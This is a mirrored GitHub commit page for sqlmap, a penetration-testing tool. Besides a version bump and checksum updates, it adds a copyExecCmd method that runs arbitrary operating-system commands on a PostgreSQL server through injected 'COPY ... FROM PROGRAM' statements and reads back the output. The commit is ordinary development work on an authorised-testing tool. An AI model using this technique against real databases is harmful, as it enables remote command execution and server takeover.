Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit ef5cb9a

Browse files
stamparmstamparm
committed
In preparation for #3545 
1 parent 14186d3 commit ef5cb9a

3 files changed

Lines changed: 15 additions & 3 deletions

File tree

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@
1919
from lib.core.enums import OS
2020

2121
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
22-
VERSION = "1.3.3.39"
22+
VERSION = "1.3.3.40"
2323
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
2424
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
2525
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

plugins/dbms/postgresql/takeover.py

Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -102,3 +102,15 @@ def uncPathRequest(self):
102102
self.createSupportTbl(self.fileTblName, self.tblField, "text")
103103
inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True)
104104
self.cleanup(onlyFileTbl=True)
105+
106+
def copyExecCmd(self, cmd):
107+
# Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
108+
self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
109+
self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField)
110+
self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''"))
111+
inject.goStacked(self._forgedCmd)
112+
113+
query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
114+
output = inject.getValue(query, resumeValue=False)
115+
116+
return output

txt/checksum.md5

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -50,7 +50,7 @@ d5ef43fe3cdd6c2602d7db45651f9ceb lib/core/readlineng.py
5050
7d8a22c582ad201f65b73225e4456170 lib/core/replication.py
5151
3179d34f371e0295dd4604568fb30bcd lib/core/revision.py
5252
d6269c55789f78cf707e09a0f5b45443 lib/core/session.py
53-
e785996e0f9edd8e309094048dc40d05 lib/core/settings.py
53+
068159b771eef31a3852da30eba31ccd lib/core/settings.py
5454
4483b4a5b601d8f1c4281071dff21ecc lib/core/shell.py
5555
10fd19b0716ed261e6d04f311f6f527c lib/core/subprocessng.py
5656
10d7e4f7ba2502cce5cf69223c52eddc lib/core/target.py
@@ -199,7 +199,7 @@ d68b5a9d6e608f15fbe2c520613ece4a plugins/dbms/postgresql/filesystem.py
199199
a2ac0498d89797041bf65e4990cf8430 plugins/dbms/postgresql/fingerprint.py
200200
fb018fd23dcebdb36dddd22ac92efa2c plugins/dbms/postgresql/__init__.py
201201
290ea28e1215565d9d12ede3422a4dcf plugins/dbms/postgresql/syntax.py
202-
339bc65824b5c946ec40a12cd0257df1 plugins/dbms/postgresql/takeover.py
202+
cee109ef785cd1ebbc1df5311246094d plugins/dbms/postgresql/takeover.py
203203
014968f7b28abe3ca8e533843a017453 plugins/dbms/sqlite/connector.py
204204
6a0784e3ce46b6aa23dde813c6bc177f plugins/dbms/sqlite/enumeration.py
205205
3c0adec05071fbe655a9c2c7afe52721 plugins/dbms/sqlite/filesystem.py

0 commit comments

Comments
 (0)